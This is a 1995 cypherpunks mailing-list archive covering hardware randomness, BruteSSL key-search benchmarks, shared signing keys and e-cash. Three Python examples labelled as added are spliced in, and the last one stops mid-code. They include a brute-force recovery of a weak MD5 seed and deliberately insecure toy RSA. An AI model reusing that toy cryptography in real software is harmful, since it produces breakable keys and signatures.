|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 23 Aug 95 15:59:15 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: Random Hiss from Mac mike
In-Reply-To: <v01510106ac5cd6edbafb@[193.74.217.20]>
Message-ID: <199508232258.SAA24087@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Take a look at RFC 1750.  It discusses randomness.  If your
input to MD5 consists of two long strings of constants, your output
from MD5 only has really a very few bits of entropy (I think you end
up with 7, or possibly 14 if there are two transitions.  Not a lot of
entropy at all.)


| I've been looking at using the Mac's Sound Input Manager for hardware RNG.
| The advantage of it is that (1) most macs have a microphone port these
| days, (2) it doesn't involve any user interaction, (3) the API is easy.
| 
| What I don't know, is how secure it is.  Or more precisely, I don't know
| how much entropy is contained in the signal.
| 
| In the simplest case, where the microphone is not attached, the signal
| consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
| problem transforming this into uniformly distributed RN's : just hash the
| buffer with MD5.

	Again, the output of a hash is only as good as its input.  If
you input 40 random bits, and 88 known bits, we only need to search
the 40 known bits.  If you input a string of the form 00000011, with 2
runs of some length, we don't have to search 11100111 as a
possibility.  There are only 8 strings which match if your constraints
are 8 bits, starting with 0, and only a single transition to a
different state.  So, by knowing those rules, we only have to search
2^3 strings instead of 2^8.

	If there isn't a microphone, and the OS gives you a steady
stream, then the sound port is a bad source of randomness, even with a
hash.  Use mouse movement, keyboard input, or the parity of long
strings of either of those.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Wed, 23 Aug 95 10:09:32 PDT
To: cypherpunks@toad.com
Subject: Random Hiss from Mac mike
Message-ID: <v01510106ac5cd6edbafb@[193.74.217.20]>
MIME-Version: 1.0
Content-Type: text/plain


I've been looking at using the Mac's Sound Input Manager for hardware RNG.
The advantage of it is that (1) most macs have a microphone port these
days, (2) it doesn't involve any user interaction, (3) the API is easy.

What I don't know, is how secure it is.  Or more precisely, I don't know
how much entropy is contained in the signal.

In the simplest case, where the microphone is not attached, the signal
consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
problem transforming this into uniformly distributed RN's : just hash the
buffer with MD5.

My question is, how many bytes get fed into the hash?
Obviously, enough bytes so that I have 128 bits of entropy.

Preliminary tests give me a max entropy of about .65 bits per sample byte.
That's not very much, but if I can sample at ~20 KHz, that's 1625 bytes per
second.

That's estimated by recording the length of runs and computing the entropy over
the entire sample: i.e. the sum (for k = 1 to 120) of -(fraction of runs of
length k * log2 of that fraction). That works out to about 3.3 bits per run
with an average run of 5.1 bytes.

I suspect there's much less entropy in that signal than even this estimate,
but I don't have any way to conduct tests with pure 50 cycle power and
uniform ambient temperature.  Or whatever else biases the signal.  For all
I know, every time someone in this building starts his microwave it biases
the signal.

Does anybody have any experience/advice in this area?

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.
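
The run-length estimate described in this post and the search-space argument in Adam Shostack's reply to it, worked through as an added example (not code from either poster). It assumes a buffer whose bytes take only the two reported values 0x80 and 0x7f; the 128-byte length, the sample buffers and all function names are constructed for illustration.

```python
import hashlib
import math
from collections import Counter
from itertools import combinations

HI, LO = 0x80, 0x7F  # the two sample values reported for the unplugged input


def run_lengths(buf):
    """Lengths of the maximal runs of identical bytes in buf."""
    runs = []
    for i, b in enumerate(buf):
        if i and b == buf[i - 1]:
            runs[-1] += 1
        else:
            runs.append(1)
    return runs


def run_entropy(buf):
    """Return (bits per run, bits per byte) using the run-length estimator.

    Runs are treated as independent draws, so the result is an upper
    bound: any dependence between successive runs lowers the real figure.
    """
    runs = run_lengths(buf)
    if not runs:
        return 0.0, 0.0
    total = len(runs)
    h_run = -sum((c / total) * math.log2(c / total)
                 for c in Counter(runs).values())
    return h_run, h_run * total / len(buf)


def candidate_buffers(n, transitions, first=HI):
    """Yield each n-byte HI/LO buffer that starts at `first` and changes
    level exactly `transitions` times."""
    for cuts in combinations(range(1, n), transitions):
        out, level, start = bytearray(), first, 0
        for cut in cuts + (n,):
            out += bytes([level]) * (cut - start)
            level = LO if level == HI else HI
            start = cut
        yield bytes(out)


def search_space(n, max_transitions):
    """(number of candidates, equivalent bits) for at most max_transitions
    level changes, with the starting level known."""
    count = sum(math.comb(n - 1, t) for t in range(max_transitions + 1))
    return count, math.log2(count)


def recover_buffer(digest, n, max_transitions):
    """Find the buffer behind an MD5 digest by walking the constrained space.

    Hashing does not help: the digest can only take as many values as
    there are candidate inputs.
    """
    tried = 0
    for t in range(max_transitions + 1):
        for cand in candidate_buffers(n, t):
            tried += 1
            if hashlib.md5(cand).digest() == digest:
                return cand, tried
    return None, tried


if __name__ == "__main__":
    # Constructed sample: 128 bytes with one change of level after 37 samples.
    sample = bytes([HI]) * 37 + bytes([LO]) * 91
    seed = hashlib.md5(sample).digest()  # 128 bits that look uniform

    print("8 symbols, <=1 transition :", search_space(8, 1))
    print("128 bytes, <=1 transition :", search_space(128, 1))
    print("128 bytes, <=2 transitions:", search_space(128, 2))

    found, tried = recover_buffer(seed, 128, 1)
    print("recovered:", found == sample, "after", tried, "MD5 calls")

    # Constructed buffer with runs of 4, 6, 4, 6 bytes.
    runs_demo = (bytes([HI]) * 4 + bytes([LO]) * 6) * 2
    print("bits/run, bits/byte:", run_entropy(runs_demo))
```

An unknown starting level adds one bit to each search-space figure; the digest still carries no more entropy than the buffer that produced it.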






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 23 Aug 95 16:15:17 PDT
To: cypherpunks@toad.com
Subject: PacBell's idea of a good password
Message-ID: <199508232310.TAA08757@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the PacBell Message Center (voice mail) brochure:
"Make it easier to remember your password by choosing a code you use
already, i.e. a PIN number or birth date."

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDu1OyoZzwIn1bdtAQEvlAF+ObOioS3uF8obI6BRhtjfkZdvRAztTlUa
uCjeR0AH2MzNEgTFM0mCSXuTnyy/trG0
=rg3O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Wed, 23 Aug 95 12:05:39 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <9508231905.AA28419@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain



>Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
>UK:      ftp://ftp.ox.ac.uk/pub/crypto/
>Croatia: http://pgp.rasip.fer.hr/
>Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/

Don't forget Australia: http://psych.psy.uq.oz.au/~ftp/Crypto/
It's especially relevant because there is a version of Mosaic
that uses 128-bit SSL (i.e. truly secure).  I have most of these
pointers in my SSL crack Web page (which has evolved quite a bit
in one week).

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Wed, 23 Aug 95 21:48:42 PDT
To: cypherpunks@toad.com
Subject: Linux brutessl client
Message-ID: <199508240448.VAA12304@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi.

I've been able to compile a working brutessl 1.02 client under linux
and gcc 2.7.0, but I get abysmal search speeds.

My system is a pentium 60, which, according to the docs, ought to have
a speed of something over 14100 kps (that's what a 486dx2/66 with no
rotate left macro gets).

brutessl -t reports that my system can do 11200 keys per second.

Is there any obvious reason this number is so much lower than
expected?  I'm reasonably certain gcc implements a rotl macro, but I
don't know how to make use of it -- has anyone out there gotten
assembly.c to compile under gcc?

Finally, are there any additional optimizations for pentium machines
available?

thanks,
-sq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 23 Aug 95 21:56:56 PDT
To: cypherpunks@toad.com
Subject: Shared secrets and corporations in Cyberspace.
Message-ID: <199508240456.VAA06659@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


How can collective entities hold keys?


Corporations derive their cohesion partly from realspace coercion, and
partly by trust based on face to face interactions among the participants,
and partly from their brand name.  Trusts derive their cohesion primarily
from trust, again based on face to face interaction.

A cyberspace corporation would derive its cohesion primarily from its name
identification and the public key associated with its brand name.  Consumers
would presumably wish their financial instruments to be signed to the public
key of Megacorp life insurance, rather than Megacorp's insurance salesman,
for fear that otherwise their funds might go astray, or they might get bad
software, etc, and the private key corresponding to that public key will
sign the employees' paycheques.

If a cyberspace corporation does not have a valued brand name it is likely
to disintegrate into its components, in the way that some realspace
corporations did in the boisterous early days of silicon valley.

But this creates a problem of "owning the corporation". If one man knows the
corporation's secret key, he can pretty much tell the shareholders to go take
a hike.  If two men know the secret key, it probably will not remain secret
much longer.

One solution is to use truenames, rather than keys as the "real identity" --
set up financial transaction software so that it considers that any key
signed by a proper authority certifying the key to be the key of Megacorp is
a valid Megacorp key, that all such keys are equivalent, and that the
authority will only issue keys to one entity called Megacorp.  Then when
folk start fighting over who is the real Megacorp, the authority resolves
the dispute by conventional means.

Current proposals for transaction software are based on truenames and
trees-of-trust.  This is not too bad as long as we have a forest, not a
single tree, but still, one would like to have some arrangement whereby a
large number of people could share a single key, and can buy and sell
interests in that key, whereby we can have the mechanisms of shared
ownership without the need for an external authority to enforce it.

Obviously trusts will work fine in Cyberspace, but trusts are by their
nature small and undemocratic.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 23 Aug 95 22:28:20 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <199508240528.WAA09482@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 8/22/95 -0400, Robert Hettinga wrote:
> It's easy
> to see how a combination of certification technology and cryptographically
> anonymous voting protocols allow the direct election of a company's board
> members without proxies -- another hierarchical device -- for instance.

It is not so easy for me to see how such protocols allow the 
shareholders to control the company's keys if the CEO 
tells the shareholders to go and stick their heads 
in a bucket.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 23 Aug 95 19:59:21 PDT
To: cypherpunks@toad.com
Subject: Re: The End of the Ecash Trial?
In-Reply-To: <v02120d04ac6112134b53@[199.0.65.105]>
Message-ID: <9508240258.AA22751@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The problem with being a bank is the price of the bank software, which is
>where David Chaum and Co. want to make their money.  Thus, the last price I
>got (offhand) from David on the phone a year ago was $250k + 10% of net
>profits.  Given the cost of hardware, people, lawyers, and if you actually
>back the certificates with dollars in a bank of deposit (not being what we
>want to do here, admittedly) bankers, and more lawyers.  Could add up to a
>multimillion dollar proposition.

So Dave expects a Bank to pay him $250,000 + 10% so they can't find anything 
out about their customers spending habits.

Doesn't sound as if it's all that tempting a proposition for them, they are 
expected to both create the market and pay the monopolist to participate in it. 

If Chaum had given his system away, got everyone using it he might have a 
Netscape type situation. As it is I can't see a great deal of incentive for the 
people he expects money from to give it him.

I don't think this is a going proposition at the moment. 

It might work for Motorway service tolls and such. I can easily see a method of 
getting a political party to buy into such a scheme. It would be kind of ironic 
given the political motivations of most anonymous payment supporters if the 
government turned out to be the only organisation likely to buy the product.

Personally I don't like Motorway service tolls.

Any other people have some ideas about people likely to pay 0.25 M +10% of 
profits? Perhaps it could be used for gambling?


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Wed, 23 Aug 95 20:09:03 PDT
To: perry@piermont.com
Subject: Re: is there...
Message-ID: <v01530500ac619d829e4a@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:56 PM 8/23/95, Perry E. Metzger wrote:
>Is there an online version of Raph's anonymous remailer list for FTP
>or on the web? I suddenly need to give it to someone.
>
>.pm

http://www.cs.berkeley.edu/~raph/remailer-list.html

   --D.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Wed, 23 Aug 95 21:15:32 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <199508240410.AA14034@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



The other night I heard that some of the rules for selling stock have
been changed to allow companies to sell stock directly to investors.
I have been thinking that this may have the potential to support an
interesting system.

Imagine "Portfolio Accounts" with a debit-card like access method.
Instead of paying for an item at a store with money or credit you use
your Portfolio-Account card and buy the item with shares/micro-shares
of stock. Stock brokers may offer this type of service in response to the
competition of companies bypassing them. Stock brokers could set up
services that mediate between transactions calculating trades and values
"on-the-fly" (anonymity could be tricky to build into this system).

If the company you worked for paid you with stock instead of money this
would complete the loop.

Portfolio Accounts could be "cashed out" but if they have all of the
attributes of money and don't suffer from inflation why not keep your
stock invested.

This also has the interesting feature of avoiding all taxes. Until you
"cash out" your account you would not have to pay taxes, if you never
need to cash out your account, you never need to pay taxes. I suspect that
our friendly governments would try to "correct" this "problem" in the
long run if they can.

Steven Weller writes:

[snip]
> 
> In such a system, where does credit come in? If I have a certificate that
> is worth X, then does the recipient know that it's from my "credit card"?
> How do I obtain credit, and in what form does it exist?
>

Could credit be supported by distributed futures market system?

> 
> Furthermore, how do we assess the value of real physical things in a system
> like this?

If you had a stock transaction mediated economy the "currency" in this
system would be backed by the goods and services produced by companies
issuing stock.

You could view stock in this system as private currencies, and there
would be thousands of competing currencies.

I have been thinking that this might be a viable path to denationalized
currencies.

Stock certificates could be based on cryptographic verification protocols.
If all the stock in this system were 'bearer-based' (i.e., you possess it you
own it) you could also support cash-like anonymity as well.

>
> 
> --
> Steven Weller  <Windsor Consulting Group>         +1 502 454 0054 (voice)
> OS-9 Consultancy and Software                       +1 502 451 5935 (fax)
> Finger for public key    00 02 3C 2F 83 76 D3 77  2A 95 E8 90 94 9A 9D 74
> http://iglou.com/windsorgrp   stevenw@iglou.com or realtime@well.sf.ca.us
> 
>

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the Turing Test.         ]
[                   Alan Penny, penny@tyrell.net                          ]
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Wed, 23 Aug 95 23:29:09 PDT
To: cypherpunks@toad.com
Subject: Shared secrets, virtual corporations
Message-ID: <199508240628.XAA00538@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


< Collective holding of signer keys >

There are protocols that allow a group of people to collectively hold a
key. A message is passed down the line, each person in turn operating
on it, and at the end it has been signed. In this way the board of
directors can sign a message without any one person having the key.

These protocols can probably be combined with a secret-sharing system,
so that a message can be signed if a certain percentage of the
key-share holders collaborate. This allows voting, with the object of
the vote getting signed only if >50% vote for it.

Taking a share away from someone is a bit of a problem. If someone
needs to lose his voting privileges, you probably have to generate a
new key and sign it with the old one, then revoke the old one.

						Mike
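
One way the pass-it-down-the-line signing in the first paragraph could work, as an added example (not code from the post, which names no specific protocol): an RSA private exponent is split into multiplicative factors, each holder raises the running value to his own factor, and the end result verifies under the ordinary public key. Assumptions: textbook RSA without padding, a toy key built from two constructed primes, a trusted dealer who generates and splits the key, and illustrative function names; the voting threshold in the second paragraph is not covered.

```python
import hashlib
import math
import secrets

# Constructed demo key from two Mersenne primes. Far too small and too
# structured for real use; chosen only so the example runs instantly.
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q
PHI = (P - 1) * (Q - 1)
E = 65537
D = pow(E, -1, PHI)  # full private exponent, seen only by the dealer


def digest_int(message):
    """Hash the message to an integer below N (no padding: illustration only)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def split_exponent(d, holders):
    """Split d into `holders` factors whose product is d modulo PHI.

    All but the last factor are random units modulo PHI; the last one is
    whatever makes the product come out right. No single factor equals d
    (except with negligible probability).
    """
    shares, product = [], 1
    for _ in range(holders - 1):
        while True:
            s = secrets.randbelow(PHI - 2) + 2
            if math.gcd(s, PHI) == 1:
                break
        shares.append(s)
        product = product * s % PHI
    shares.append(d * pow(product, -1, PHI) % PHI)
    return shares


def pass_down_the_line(message, shares):
    """Each holder in turn raises the running value to his own share."""
    value = digest_int(message)
    for s in shares:
        value = pow(value, s, N)
    return value


def verify(message, signature):
    """Ordinary RSA verification with the public key (N, E)."""
    return pow(signature, E, N) == digest_int(message)


if __name__ == "__main__":
    resolution = b"Board resolution 1 (constructed sample text)"
    shares = split_exponent(D, 5)  # five directors

    full = pass_down_the_line(resolution, shares)
    print("all five operated   :", verify(resolution, full))

    # Exponentiation commutes, so the order of the line does not matter.
    shuffled = pass_down_the_line(resolution, shares[::-1])
    print("reverse order       :", verify(resolution, shuffled))

    # If one holder refuses, the partial result is not a signature.
    partial = pass_down_the_line(resolution, shares[:-1])
    print("one holder missing  :", verify(resolution, partial))
```

Because every share is needed, removing a holder means dealing a new key, which matches the revocation problem raised in the last paragraph.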



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 23:00:26 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <ac6162493c02100413f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:10 AM 8/24/95, Alan Penny wrote:
>The other night I heard that some of the rules for selling stock have
>been changed to allow companies to sell stock directly to investors.
>I have been thinking that this may have the potential to support an
>interesting system.

My company sold stock to me directly, through a Stock Participation Plan
and an Incentive Stock Option Plan.

>Imagine "Portfolio Accounts" with a debit-card like access method.

I use a debit card which directly accesses my stock account. More on this
in a moment.

>Instead of paying for an item at a store with money or credit you use
>your Portfolio-Account card and buy the item with shares/micro-shares
>of stock. Stock brokers may offer this type of service in response to the
>competition of companies bypassing them. Stock brokers could set up
>services that mediate between transactions calculating trades and values
>"on-the-fly" (anonymity could be tricky to build into this system).

This is where it breaks down. Stock prices are denominated in dollars (or
the local currency, as applicable). And local purchases are denominated in
dollars. Nobody pays "one microMicrosoft" for a loaf of bread. They pay $1.
And Microsoft stock sells for $100, not 100 loaves of bread.

>If the company you worked for paid you with stock instead of money this
>would complete the loop.

The IRS and other tax authorities have this one figured out: barter
economies are not generally a way to avoid taxes.

>This also has the interesting feature of avoiding all taxes. Until you
>"cash out" your account you would not have to pay taxes, if you never
>need to cash out your account, you never need to pay taxes. I suspect that
>our friendly governments would try to "correct" this "problem" in the
>long run if they can.

If you are paid in barter for some service, taxes are still owed, based on
the estimated value of services rendered.

By the way, a simpler example than all this talk of partial shares of
companies is simply to talk about paying each other in gold, or oil, or any
other commodities.

Try to convince the IRS that taxes are not owed because one was paid in
ounces of gold instead of dollars.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Wed, 23 Aug 95 23:35:16 PDT
To: ecm@ai.mit.edu
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <v03002c09ac61c9f67554@[198.93.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:16 23.8.95, aba@dcs.exeter.ac.uk wrote:

> Any platforms you would like to see pre-compiled binaries for, send them
> along, the source code is available from the ftp, and http addresses
> above.  A MAC binary would be nice also.

I have a working version of BruteSSL 1.02 (without SKSP client) for
Power Macintosh. However, as I don't want to run the risk of violating
ITAR, I'm still investigating ways of making it available. Suggestions
are welcome.

Stephan

________________________________________________________________________
Stephan Somogyi            Wer bremst hat Angst            Digital Media







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 23 Aug 95 22:44:43 PDT
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: Linux brutessl client
In-Reply-To: <199508240448.VAA12304@quesnay.Berkeley.EDU>
Message-ID: <Pine.LNX.3.91.950823233650.3783J-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 23 Aug 1995, Sam Quigley wrote:

> Date: Wed, 23 Aug 1995 21:48:33 -0700
> From: Sam Quigley <poodge@econ.Berkeley.EDU>
> To: cypherpunks@toad.com
> Subject: Linux brutessl client
> 
> 
> Hi.
> 
> I've been able to compile a working brutessl 1.02 client under linux
> and gcc 2.7.0, but I get abysmal search speeds.
> 
> My system is a pentium 60, which, according to the docs, ought to have
> a speed of something over 14100 kps (that's what a 486dx2/66 with no
> rotate left macro gets).
> 
> brutessl -t reports that my system can do 11200 keys per second.

i'm running linux 1.2.11 on my DX4-100 (might be faster than your P60) 
and i get these results..

zifi:~/crypto/ssl> brutessl -t

                                BruteSSL 1.0

Self test... OK

17 minutes and 8 seconds per segment, 16300 keys per second.
zifi:~/crypto/ssl> file brutessl
brutessl: ELF 32-bit LSB executable i386 (386 and up) Version 1


the perl code doesn't seem to work quite right for me though, giving 
errors when i try to use more than one option at a time, ie.

Identifier "main::dkltrc4" used only once: possible typo.

anyway, i'm not sure i'll be participating this time as i won't be around 
too much.

ciao,

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDwSA03Qo/lG0AH5AQG1jQP/ec+MO0BTFGF53eWohIlCBxpdaXnCnFJe
9TvhbRPX7kjuVyVKcuT6KdHrZ/+qrsLAXCrlml5UuAemUmyAE4NeR3NrbJ7rgXWg
g+UfzIC46799/MNu0XQeCZdip2aq+3VojakoPcd/VThW7BUKxdJeNyP/C8XhjxMg
+tLRnuiVrjA=
=xGxM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Wed, 23 Aug 95 20:57:45 PDT
To: cypherpunks@toad.com
Subject: PGPfone Release is coming soon!
Message-ID: <ac61a8bd000210043604@[18.72.0.238]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As you may have seen, the news media has picked up on the upcoming
PGPfone release. This note is to let you know that we at MIT are working
with Phil Zimmermann and the PGPfone team to distribute PGPfone from
MIT. We expect to have a *BETA* test version (Macintosh Only) of PGPfone
available shortly.

We will distribute PGPfone via anonymous FTP from net-dist.mit.edu. Look
in the /pub/PGPfone directory (which doesn't yet exist).

We will also be distributing PGP via the World Wide Web from:

                   http://web.mit.edu/network/pgpfone

This "Home" page already exists, but doesn't have the distribution yet.
Feel free to check it periodically, as it will be changed as soon as the
distribution is ready.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDv4lMUtR20Nv5BtAQEyFAP+J3oFHuwKiOu56CtYSvA7WJUGgZg37zRj
QPmMfnOD5/9nGUXGsQjs3NTMwV4Y+de4mM3Qxi/O/G0ID1aGod8pPbDkyh6wG594
FVWLu6c1E7pZcge1/Iv9nwBKbHAhOzh368YYMTIsiIlE3hjRB37/iVmIcQsOhleQ
4Qp8aJSEim8=
=Mskz
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 24 Aug 95 00:00:30 PDT
To: cypherpunks@toad.com
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508240700.AAA15310@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance -- slight.

At 09:47 AM 8/23/95 -0700, Timothy C. May wrote:
> Moore's Law is an observation of past behavior, not a law of
> nature. Gordon thought the curve would "slow down" around 
> 1980 or so. It didn't, for various reasons. But many of us 
> expect it will.
>
> Consider that a new wafer fab capable of building these 
> "Moore's Law" devices has increased in price from about $50 
> million a couple of decades ago to about $1.5 billion today. 

During the entire period that Moore's law has been in effect, we have used
light to print the wafers.

Now, with phase shifting masks in billion dollar fabs, we are reaching the
absolute limits of light.  If we go up to higher frequencies, we lose
refraction, and phase shifting fails.  Refractable light craps out at about
.3 to .15 microns.  Intel is currently at .35 microns.

There will be a slight hiccup or a major hesitation in Moore's law as the
fabs switch to a non optical printing process.

Current contenders are:

* Synchrotron radiation  (twenty billion dollar fabs, or worse.)

* ions  (fab price jumps a few times higher than current fab price.)

* electrons (no great escalation in fab price, but a radical drop in
production rates)

* flexible direct contact.  (fab price goes way down, back to producing ICs
in your garage.)

The flexible direct contact method has enough horsepower to take us all the
rest of the way down merge with biotech and to produce wires one atom thick
-- assuming that people manage to get anything useful out of it at all.

There have been very large investments in all of the above research
projects, and so far none of them have worked as yet. (But they are all of
them a hell of a lot closer to working than nanotech.)

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 24 Aug 95 00:05:28 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: Random Hiss from Mac mike
Message-ID: <199508240702.AAA24391@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:09 PM 8/23/95 +0100, Andrew Spring wrote:
>In the simplest case, where the microphone is not attached, the signal
>consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
>problem transforming this into uniformly distributed RN's : just hash the
>buffer with MD5.

If you know that's what the signal looks like, you can improve it a lot by
run-length encoding before doing the MD5, e.g. crunch the output down to 
a series of count1 value1 count2 value2 count3 value3 (if you stick to runs of
255, you can use 1 byte for each.)   That gives you a much shorter input to
the MD5, and a more realistic view of how much random data you have.
(I suppose it may make it harder to do things like Fourier transforms on it...)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
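
An added example (not part of the original post) of the run-length step Bill Stewart describes: the buffer is reduced to count/value byte pairs with runs capped at 255, the pairs are hashed with MD5, and a rough Shannon figure over the pairs shows how little randomness stands behind the 128-bit digest. The sample run lengths, function names and the entropy heuristic are constructed assumptions.

```python
import hashlib
import math
from collections import Counter


def rle_encode(buf: bytes) -> bytes:
    """Encode as count1 value1 count2 value2 ..., one byte each, runs capped at 255."""
    out = bytearray()
    i = 0
    while i < len(buf):
        value = buf[i]
        run = 1
        while run < 255 and i + run < len(buf) and buf[i + run] == value:
            run += 1
        out += bytes((run, value))
        i += run
    return bytes(out)


def rle_decode(enc: bytes) -> bytes:
    """Inverse of rle_encode; confirms the encoding discarded no sample data."""
    out = bytearray()
    for k in range(0, len(enc), 2):
        out += bytes((enc[k + 1],)) * enc[k]
    return bytes(out)


def entropy_estimate_bits(enc: bytes) -> float:
    """Plug-in Shannon figure: entropy per (count, value) pair times pair count.

    It treats the pairs as independent draws, so it is a rough figure and
    not a proof of entropy (assumption of this example, not of the post).
    """
    pairs = [enc[k:k + 2] for k in range(0, len(enc), 2)]
    if not pairs:
        return 0.0
    total = len(pairs)
    per_pair = -sum(c / total * math.log2(c / total)
                    for c in Counter(pairs).values())
    return per_pair * total


def harvest(buf: bytes) -> dict:
    """Run-length encode, hash, and report how much randomness to credit."""
    enc = rle_encode(buf)
    estimate = entropy_estimate_bits(enc)
    return {
        "raw_len": len(buf),
        "rle_len": len(enc),
        "estimate_bits": estimate,
        # MD5 is the hash named in the thread; its 128 output bits look
        # uniform no matter how little randomness went in.
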